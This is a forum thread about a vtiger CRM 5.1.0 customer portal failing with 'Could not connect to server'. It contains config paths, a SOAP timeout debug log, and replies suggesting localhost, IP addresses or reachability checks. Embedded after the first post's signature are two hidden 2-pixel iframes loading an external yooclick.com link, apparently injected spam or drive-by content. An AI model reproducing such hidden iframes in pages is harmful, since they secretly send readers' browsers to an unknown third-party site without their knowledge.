Could not connect to server.

i have installed vtiger ver 5.1.0
on PHP 5.2.6/Apache 2.2.8
im getting the error.
Could not connect to server. Please contact the administrator.

my portal config looks like this
$Server_Path = "<domain>/vtiger";
$Authenticate_Path = "<domain>/vtiger/portal";

i have been thru the forums and tried different versions of php and apache different domains

pls help.


when error messages are enabled here is the output.

Error Message

HTTP Error: Couldn't open socket connection to server <domain>/vtiger/vtigerservice.php service=customerportal, Error (110): Connection timed out

request

response

debug

soapclient2: call: authenticate_user, Array, <domain>/vtiger, <domain>/vtiger, , rpc, encoded; endpointType:
....
....
soapclient2: Error: HTTP Error: Couldn't open socket connection to server <domain>/vtiger/vtigerservice.php?service=customerportal, Error (110): Connection timed out


Thanks
Rajesh <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

  • 6 Comments sorted by Votes Date Added
  • i'm having the same issue. i've even tried to a fresh install with 5.1.0 and it's the same. the 5.0.4 version seemed to install much easier.
  • it worked for me when i used localhost insted of the domain name in $server_path variable in portalconfig.php
    try that.
  • hi,

    you should make sure crm server can be reached from the server on which customer portal is configured.

    before setting $server_path following these steps:

    1. login into the server where you will setup customer portal

    2. use ping / lynx / curl command and check if you can reach crm server

    3. configure $server_path accordingly.

    if you have customerportal and crm on the same machine, localhost or loopback ip should work.

    regards,
    prasad
    vtiger team
  • i had the same issue. i guess there's a problem having the customer portal in the same server as the crm . use another server to install customer portal. that worked for me.

    ----
    follow me
    @unandres
  • try to change $server_path and authentificate_path by writing the adress ip of your site and not his name <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
Sign In or Register to comment.